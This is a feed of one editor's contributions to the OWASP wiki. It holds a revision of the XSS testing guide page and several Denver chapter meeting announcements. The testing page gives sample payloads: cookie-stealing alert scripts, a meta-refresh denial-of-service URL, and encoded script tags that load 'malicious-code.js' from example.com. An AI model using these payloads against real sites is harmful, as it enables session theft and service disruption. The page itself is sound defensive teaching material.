<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Eduprey</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Eduprey"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Eduprey"/>
		<updated>2026-04-23T00:24:49Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&amp;diff=114669</id>
		<title>Testing for Cross site scripting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&amp;diff=114669"/>
				<updated>2011-07-27T19:26:05Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Overview ==&lt;br /&gt;
[[Cross-site Scripting (XSS)]] attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.&lt;br /&gt;
&lt;br /&gt;
==Related Security Activities==&lt;br /&gt;
&lt;br /&gt;
===Description of Cross-site scripting Vulnerabilities===&lt;br /&gt;
&lt;br /&gt;
See the OWASP articles on [[Cross-site Scripting (XSS)]] Vulnerabilities and [[DOM Based XSS]].&lt;br /&gt;
&lt;br /&gt;
===How to Avoid Cross-site scripting Vulnerabilities===&lt;br /&gt;
&lt;br /&gt;
See the [[:Category:OWASP Guide Project|OWASP Guide]] article on [[Phishing|Phishing]].&lt;br /&gt;
&lt;br /&gt;
===How to Review Code for Cross-site scripting Vulnerabilities===&lt;br /&gt;
&lt;br /&gt;
See the [[:Category:OWASP Code Review Project|OWASP Code Review Guide]] article on how to [[Reviewing Code for Cross-site scripting|Reviewing code for Cross-site scripting]] Vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
[[Category:Security Focus Area]]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
== Description of the Issue ==&lt;br /&gt;
[[Category:FIXME|I think this whole section needs to be deleted]]&lt;br /&gt;
&lt;br /&gt;
[[XSS]] attacks are essentially code injection attacks into the various interpreters in the browser. These attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash, and other client-side languages. These attacks also have the ability to gather data from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. In some cases, Cross Site Scripting vulnerabilities can perform other functions such as scanning for other vulnerabilities and performing a Denial of Service on your web server.&lt;br /&gt;
&lt;br /&gt;
Cross Site Scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties (the attacker and the web site, or the attacker and the victim client) the XSS attack involves three parties -- the attacker, a client and the web site. The goal of the XSS attack is to steal the client cookies or any other sensitive information which can authenticate the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site, impersonating the user - Identity theft!&lt;br /&gt;
&lt;br /&gt;
Online message boards, web logs, guestbooks, and user forums where messages can be permanently stored also facilitate Cross Site Scripting attacks. In these cases, an attacker can post a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the user once they click the link. Attackers can use a wide range of encoding techniques to hide or obfuscate the malicious script and, in some cases, can avoid explicit use of the &amp;lt;Script&amp;gt; tag. Typically, XSS attacks involve malicious JavaScript, but they can also involve any type of executable active content. Although the types of attacks vary in sophistication, there is a generally reliable method to detect XSS vulnerabilities. Cross Site Scripting is used in many Phishing attacks.&lt;br /&gt;
&lt;br /&gt;
'''Now we explain the three types of Cross Site Scripting: Stored, Reflected, and DOM-Based.'''&lt;br /&gt;
&lt;br /&gt;
The '''Stored Cross Site Scripting''' vulnerability is the most powerful kind of XSS attack. A Stored XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, filesystem, or other location), and later displayed to users in a web page without being encoded using HTML entity encoding. A real life example of this would be the Samy MySpace Worm, which exploited an XSS vulnerability found on MySpace in October of 2005.&lt;br /&gt;
&lt;br /&gt;
These vulnerabilities are the most significant of the XSS types because an attacker can inject the script just once. This could potentially hit a large number of other users with little need for social engineering, or the web application could even be infected by a cross-site scripting virus.&lt;br /&gt;
&lt;br /&gt;
'''Example'''&lt;br /&gt;
&lt;br /&gt;
If we have a site that permits us to leave a message to the other user (a lesson of WebGoat v3.7), and we inject a script insted of a message in the following way:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:XSSStored1.PNG]]&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now the server will store this information and when a user clicks on our fake message, his browser will execute our script as follows:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:XSSStored2.PNG]]&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The '''Reflected Cross-Site Scripting''' vulnerability is by far the most common and well-known type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If all occurrences of the search terms are not HTML entity encoded, an XSS hole will result.&lt;br /&gt;
&lt;br /&gt;
At first glance, this does not appear to be a serious problem since users can only inject code into their own pages. However, with a small amount of social engineering, an attacker could convince a user to follow a malicious URL which injects code into the results page, giving the attacker full access to that page's content. Due to the general requirement of the use of some social engineering in this case (and normally in DOM-Based XSS vulnerabilities as well), many programmers have disregarded these holes as not terribly important. This misconception is sometimes applied to XSS holes in general (even though this is only one type of XSS) and there is often disagreement in the security community as to the importance of cross-site scripting vulnerabilities. The simplest way to show the importance of a XSS vulnerability would be to perform a Denial of Service attack.&lt;br /&gt;
In some cases a Denial of Service attack can be performed on the server by doing the following:      &lt;br /&gt;
&lt;br /&gt;
 article.php?title=&amp;lt;meta%20http-equiv=&amp;quot;refresh&amp;quot;%20content=&amp;quot;0;&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This makes a refresh request roughly about every .3 seconds to particular page. It then acts like an infinite loop of refresh requests, potentially bringing down the web and database server by flooding it with requests. The more browser sessions that are open, the more intense the attack becomes. &lt;br /&gt;
&lt;br /&gt;
The '''DOM-based Cross-Site Scripting''' problem exists within a page's client-side script itself. If the JavaScript accesses a URL request parameter (an example would be an RSS feed) and uses this information to write some HTML to its own page, and this information is not encoded using HTML entities, an XSS vulnerability will likely be present, since this written data will be re-interpreted by browsers as HTML which could include additional client-side script.&lt;br /&gt;
Exploiting such a hole would be very similar to the exploitation of Reflected XSS vulnerabilities, except in one very important situation. &lt;br /&gt;
&lt;br /&gt;
For example, if an attacker hosts a malicious website which contains a link to a vulnerable page on a client's local system, a script could be injected and would run with privileges of that user's browser on their system. This bypasses the entire client-side sandbox, not just the cross-domain restrictions that are normally bypassed with XSS exploits.&lt;br /&gt;
&lt;br /&gt;
The methods of injection can vary a great deal. A perfect example of how this type of an attack could impact an organization, instead of an individual, was demonstrated by Jeremiah Grossman @ BlackHat USA 2006. The demonstration gave an example of how posting a stored XSS script to a popular blog, newspaper, or page comments section of a website can cause all the visitors of that page to have their internal networks scanned and logged for a particular type of vulnerability.&lt;br /&gt;
&lt;br /&gt;
==Black Box testing and example==&lt;br /&gt;
&lt;br /&gt;
One way to test for XSS vulnerabilities is to verify whether an application or web server will respond to requests containing simple scripts with an HTTP response that could be executed by a browser. For example, Sambar Server (version 5.3) is a popular freeware web server with known XSS vulnerabilities. Sending the server a request such as the following generates a response from the server that will be executed by a web browser:&amp;lt;BR&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://server/cgi-bin/testcgi.exe?&amp;lt;SCRIPT&amp;gt;alert(“Cookie”+document.cookie)&amp;lt;/SCRIPT&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The script is executed by the browser because the application generates an error message containing the original script, and the browser interprets the response as an executable script originating from the server.&lt;br /&gt;
All web servers and web applications are potentially vulnerable to this type of misuse, and preventing such attacks is extremely difficult.&lt;br /&gt;
&lt;br /&gt;
'''Example 1:'''&lt;br /&gt;
&lt;br /&gt;
Since JavaScript is case sensitive, some people attempt to filter XSS by converting all characters to upper case, rendering Cross Site Scripting utilizing inline JavaScript useless.  If this is the case, you may want to use VBScript since it is not a case sensitive language.&lt;br /&gt;
&lt;br /&gt;
JavaScript: &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;script&amp;gt;alert(document.cookie);&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
VBScript: &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;script type=&amp;quot;text/vbscript&amp;quot;&amp;gt;alert(DOCUMENT.COOKIE)&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Also, you can use the SRC attribute to load the attacker's JavaScript from an external site (see Example 2 below), causing the JavaScript payload to be loaded directly and bypassing capitalization effects altogether.&lt;br /&gt;
&lt;br /&gt;
'''Example 2:'''&lt;br /&gt;
&lt;br /&gt;
If they are filtering for the &amp;lt; or the open of &amp;lt;script or closing of script&amp;gt; you should try various methods of encoding:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;script src=http://www.example.com/malicious-code.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;\x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
You can find more examples of XSS Injection here: http://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* RSnake: &amp;quot;XSS (Cross Site Scripting) Cheat Sheet&amp;quot; - http://ha.ckers.org/xss.html&lt;br /&gt;
&lt;br /&gt;
* Jeremiah Grossman: &amp;quot;Hacking Intranet Websites from the Outside &amp;quot;JavaScript malware just got a lot more dangerous&amp;quot;&amp;quot; - http://www.blackhat.com/presentations/bh-jp-06/BH-JP-06-Grossman.pdf&lt;br /&gt;
&lt;br /&gt;
* Amit Klien: &amp;quot;DOM Based Cross Site Scripting&amp;quot; - http://www.securiteam.com/securityreviews/5MP080KGKW.html&lt;br /&gt;
&lt;br /&gt;
* Paul Lindner: &amp;quot;Preventing Cross-site Scripting Attacks&amp;quot; - http://www.perl.com/pub/a/2002/02/20/css.html&lt;br /&gt;
&lt;br /&gt;
* CERT: &amp;quot;CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests&amp;quot; - http://www.cert.org/advisories/CA-2000-02.html&lt;br /&gt;
&lt;br /&gt;
* Aung Khant: &amp;quot;What XSS Can do - Benefits of XSS From Attacker's view&amp;quot; - http://yehg.net/lab/pr0js/papers/What%20XSS%20Can%20Do.pdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&lt;br /&gt;
&lt;br /&gt;
* '''OWASP CAL9000''' - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project&lt;br /&gt;
CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more. It's hosted at http://yehg.net/lab/pr0js/pentest/CAL9000/ .&lt;br /&gt;
&lt;br /&gt;
* '''PHP Charset Encoder(PCE)''' - http://yehg.net/encoding&lt;br /&gt;
PCE helps you encode arbitrary texts to and from 65 kinds of charsets that you can use in your customized payloads.  &lt;br /&gt;
&lt;br /&gt;
* '''HackVector(HVR)''' - http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89742</id>
		<title>Denver September 2010 meeting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89742"/>
				<updated>2010-09-21T17:44:26Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Wednesday 22 September 2010, 6pm @ [http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;q=hosting.com&amp;amp;sll=39.699262,-104.986725&amp;amp;sspn=0.159814,0.258522&amp;amp;ie=UTF8&amp;amp;radius=8.24&amp;amp;split=1&amp;amp;rq=1&amp;amp;ev=zi&amp;amp;hq=hosting.com&amp;amp;hnear=&amp;amp;ll=39.699262,-104.986725&amp;amp;spn=0.159814,0.258522&amp;amp;z=12&amp;amp;iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==&lt;br /&gt;
&lt;br /&gt;
=== Eric Duprey: &amp;quot;Application Vulnerability Shooting Gallery&amp;quot; ===&lt;br /&gt;
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged.   Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high.  One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications.  It will cover discovering vulnerabilities at runtime, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Presenter: '''Eric Duprey'''&lt;br /&gt;
&lt;br /&gt;
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter and a Senior Security Consultant with FishNet Security.  For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code.  Eric has presented talks at major security conferences including DEFCON and SANS penetration testing summit.&lt;br /&gt;
&lt;br /&gt;
=== Agenda ===&lt;br /&gt;
* 6pm: Pizza &amp;amp; pop, sponsored by FishNet Security&lt;br /&gt;
* 6:30pm: Introduction and Chapter business&lt;br /&gt;
* 6:45pm --&amp;gt; 8pm: Presentation&lt;br /&gt;
* 8pm and later:  Beer and ping pong hosted by Hosting.com&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89318</id>
		<title>Denver September 2010 meeting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89318"/>
				<updated>2010-09-15T01:40:02Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Wednesday 22 September 2010, 6pm @ [http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;q=hosting.com&amp;amp;sll=39.699262,-104.986725&amp;amp;sspn=0.159814,0.258522&amp;amp;ie=UTF8&amp;amp;radius=8.24&amp;amp;split=1&amp;amp;rq=1&amp;amp;ev=zi&amp;amp;hq=hosting.com&amp;amp;hnear=&amp;amp;ll=39.699262,-104.986725&amp;amp;spn=0.159814,0.258522&amp;amp;z=12&amp;amp;iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==&lt;br /&gt;
&lt;br /&gt;
=== Eric Duprey: &amp;quot;Application Vulnerability Shooting Gallery&amp;quot; ===&lt;br /&gt;
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged.   Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high.  One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications.  It will cover discovering vulnerabilities at runtime, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Presenter: '''Eric Duprey'''&lt;br /&gt;
&lt;br /&gt;
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter.  For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code.  Eric has presented talks at major security conferences including DEFCON and SANS penetration testing summit.&lt;br /&gt;
&lt;br /&gt;
=== Agenda ===&lt;br /&gt;
* 6pm: Pizza &amp;amp; pop, sponsored by FishNet Security&lt;br /&gt;
* 6:30pm: Introduction and Chapter business&lt;br /&gt;
* 6:45pm --&amp;gt; 8pm: Presentation&lt;br /&gt;
* 8pm and later:  Beer and ping pong hosted by Hosting.com&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89317</id>
		<title>Denver September 2010 meeting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89317"/>
				<updated>2010-09-15T01:38:26Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Wednesday 22 September 2010, 6pm @ [http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;q=hosting.com&amp;amp;sll=39.699262,-104.986725&amp;amp;sspn=0.159814,0.258522&amp;amp;ie=UTF8&amp;amp;radius=8.24&amp;amp;split=1&amp;amp;rq=1&amp;amp;ev=zi&amp;amp;hq=hosting.com&amp;amp;hnear=&amp;amp;ll=39.699262,-104.986725&amp;amp;spn=0.159814,0.258522&amp;amp;z=12&amp;amp;iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==&lt;br /&gt;
&lt;br /&gt;
=== Eric Duprey: &amp;quot;Application Vulnerability Shooting Gallery&amp;quot; ===&lt;br /&gt;
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged.   Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high.  One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications.  It will cover discovering vulnerabilities at runtime, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Presenter: '''Eric Duprey'''&lt;br /&gt;
&lt;br /&gt;
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter.  For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code.  Eric has presented talks at major security conferences including DEFCON and SANS penetration testing summit.&lt;br /&gt;
&lt;br /&gt;
=== Agenda ===&lt;br /&gt;
* 6pm: Pizza &amp;amp; pop, sponsored by FishNet Security&lt;br /&gt;
* 6:30pm: Introduction and Chapter business&lt;br /&gt;
* 6:45pm --&amp;gt; 8pm: Presentation&lt;br /&gt;
* 8pm onward:  Beer and ping pong hosted by Hosting.com&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver&amp;diff=89316</id>
		<title>Denver</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver&amp;diff=89316"/>
				<updated>2010-09-15T01:21:59Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Denver|extra=Chapter leaders are [mailto:eduprey@gmail.com Eric Duprey] and [mailto:dcampbell@owasp.org David Campbell].   |mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-denver|emailarchives=http://lists.owasp.org/pipermail/owasp-denver}}&lt;br /&gt;
&lt;br /&gt;
==== Local News ====&lt;br /&gt;
&lt;br /&gt;
=====Next Chapter Meeting: [http://denverowasp.eventbrite.com/ RSVP Now!]=====&lt;br /&gt;
[[Denver September 2010 meeting|September 22nd 2010: Eric Duprey: Application Vulnerability Shooting Gallery]]&lt;br /&gt;
&lt;br /&gt;
Next Denver meeting is scheduled for Wed, 22 Aug 2010 at an all new central Denver location.  We've heard your gripes that Raytheon and Dish are too far south, and thanks to the fine folks at Hosting.com are pleased to be hosting our September meeting much closer to downtown, but with free parking! (and, for this meeting, free beer!)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- We have had several people ask that our next chapter meeting be a walkthrough of the FROC2010 CTF.  We are looking at Wed, 21 July 2010 for this event in a new location near downtown Denver (though with free parking!).&lt;br /&gt;
&lt;br /&gt;
We are also looking at doing a static analysis working group.  Due to the [http://www.theregister.co.uk/2010/04/21/white_house_open_sources_code/ hype] surrounding the recent adoption of Drupal by the White House and the [http://www.theregister.co.uk/2010/05/10/drupal_security_bug/ row] that ensued when an XSS flaw was found recently, OWASP is keen to help.&lt;br /&gt;
&lt;br /&gt;
Our friends at [http://www.fortify.com/ Fortify Software] and a [http://drupal.org/user/36762 local] OWASP'er who is also a member of the Drupal Security team have proposed that our next meeting be a half day working session to perform static analysis and verification on Drupal.&lt;br /&gt;
&lt;br /&gt;
Interested?  Let us know.  Tweet with hashtag #owasp303 or email us at froc@owasp.org. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Front Range OWASP Conference (FROC 2010) =====&lt;br /&gt;
[[Front_Range_OWASP_Conference_2010|FROC 2010]] was a sellout success! Thanks for your support.  The [http://www.surveymonkey.com/sr.aspx?sm=Fn2UBK3eyju0z2k3B8XpvHvs9s_2bdRO1BS428Of_2f9ZA0_3d survey results] are now posted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====OWASP Podcast=====&lt;br /&gt;
[http://www.owasp.org/index.php/OWASP_Podcast OWASP Podcast]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;Denver&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Questions, Comments==&lt;br /&gt;
Questions can be directed to &lt;br /&gt;
&lt;br /&gt;
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org&lt;br /&gt;
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Chapter Meetings ====&lt;br /&gt;
&lt;br /&gt;
== Future Meetings == &lt;br /&gt;
&amp;lt;!-- TBD&lt;br /&gt;
&lt;br /&gt;
We have had several people ask that our next chapter meeting be a walkthrough of the FROC2010 CTF.  We are looking at Wed, 21 July 2010 for this event in a new location near downtown Denver (though with free parking!).&lt;br /&gt;
&lt;br /&gt;
We are also looking at doing a static analysis working group.  Due to the [http://www.theregister.co.uk/2010/04/21/white_house_open_sources_code/ hype] surrounding the recent adoption of Drupal by the White House and the [http://www.theregister.co.uk/2010/05/10/drupal_security_bug/ row] that ensued when an XSS flaw was found recently, OWASP is keen to help.&lt;br /&gt;
&lt;br /&gt;
Our friends at [http://www.fortify.com/ Fortify Software] and a [http://drupal.org/user/36762 local] OWASP'er who is also a member of the Drupal Security team have proposed that our next meeting be a half day working session to perform static analysis and verification on Drupal.&lt;br /&gt;
&lt;br /&gt;
Interested?  Let us know.  Tweet with hashtag #owasp303 or email us at froc@owasp.org. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Denver September 2010 meeting|September 22nd 2010: Eric Duprey: Application Vulnerability Shooting Gallery]]&lt;br /&gt;
&lt;br /&gt;
== Past Meetings ==&lt;br /&gt;
[[Denver August 2010 meeting|August 18th 2010: Clint Pollock: Protecting Your Applications from Backdoors]]&lt;br /&gt;
&lt;br /&gt;
[[Front_Range_OWASP_Conference_2010|June 2nd 2010: Front Range OWASP Conference]]&lt;br /&gt;
&lt;br /&gt;
[[Denver January 2010 meeting|January 20th 2010: John Evans: Securing Webapps: An Illustrative Overview]]&lt;br /&gt;
&lt;br /&gt;
[[Denver November 2009 meeting|November 18th 2009: Anton Rager: Advanced XSS]]&lt;br /&gt;
&lt;br /&gt;
[[Denver August 2009 meeting|August 27th 2009: Jon Rose: Security in the Clouds]]&lt;br /&gt;
&lt;br /&gt;
[[Denver May 2009 meeting|May 2009: Dr. Joseph McComb &amp;amp; and Daniel Weiske: Compliance and application security testing]]&lt;br /&gt;
&lt;br /&gt;
[[Front_Range_OWASP_Conference_2009|March 2009: Front Range OWASP Conference (SnowFROC)]]&lt;br /&gt;
&lt;br /&gt;
[[Denver January 2009 meeting|January 2009: David Campbell &amp;amp; Eric Duprey: Guided Tour: AppSec NYC '08 CTF]]&lt;br /&gt;
&lt;br /&gt;
[[Denver October 2008 meeting|October 2008: Alex Smolen: The OWASP ASP .NET ESAPI]]&lt;br /&gt;
&lt;br /&gt;
[[Denver September 2008 meeting|September 2008: John Dickson: Black Box vs. White Box: Different App Testing Strategies]]&lt;br /&gt;
&lt;br /&gt;
[[Denver August 2008 meeting|August 2008: Dan Cornell: Static Analysis]]&lt;br /&gt;
&lt;br /&gt;
[[Denver July 2008 meeting|July 2008: David Byrne &amp;amp; Eric Duprey: Grendel-Scan]]&lt;br /&gt;
&lt;br /&gt;
[[Front Range OWASP Conference|June 2008: Front Range OWASP Conference: Jeremiah Grossman, Robert Hansen, and more!]]&lt;br /&gt;
&lt;br /&gt;
[[Denver May 2008 meeting|May 2008: David Campbell &amp;amp; Eric Duprey: XSS Attacks &amp;amp; Defenses]]&lt;br /&gt;
&lt;br /&gt;
[[Denver April 2008 meeting|April 2008: Ryan Barnett: Virtual Patching with ModSecurity]]&lt;br /&gt;
&lt;br /&gt;
[[Denver February 2008 meeting|February 2008: Michael Sutton: SQL Injection Revisited]]&lt;br /&gt;
&lt;br /&gt;
[[Denver June 2007 meeting|June 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver April 2007 meeting|April 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver February 2007 meeting|February 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver January 2007 meeting|January 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver November 2006 meeting|November 2006]]&lt;br /&gt;
&lt;br /&gt;
==[[Related_Organizations|Local Organizations of Interest]]==&lt;br /&gt;
&lt;br /&gt;
==== Mailing List ====&lt;br /&gt;
Join the [http://lists.owasp.org/mailman/listinfo/owasp-denver OWASP Denver Mailing List] to receive meeting notifications via email&lt;br /&gt;
&lt;br /&gt;
==== Twitter Feed @owasp303 ====&lt;br /&gt;
Denver OWASP has created a [http://twitter.com/owasp303 Twitter feed @owasp303] to keep you in the loop.  Whilst the mailing list is primarily intended to be low-traffic and only provide updates regarding the times, locations, and topics for chapter meetings, the Twitter feed will also provide noteworthy appsec updates.&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
